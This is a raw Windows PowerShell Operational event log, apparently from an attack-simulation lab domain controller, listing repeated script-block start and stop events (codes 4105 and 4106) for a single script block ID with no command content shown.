OpCode=On create calls
RecordNumber=1473144
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473143
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473142
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473141
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473140
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473139
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473138
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473137
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473136
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473135
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473134
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473133
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473132
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473131
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473130
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473129
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473128
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473127
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473126
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473125
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473124
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473123
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473122
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473121
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473120
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473119
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473118
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473117
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473116
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473115
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473114
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473113
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473112
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473111
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473110
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473109
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473108
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473107
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473106
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473105
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473104
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473103
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473102
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473101
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473100
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473099
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473098
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473097
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473096
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473095
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473094
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473093
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473092
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473091
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473090
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
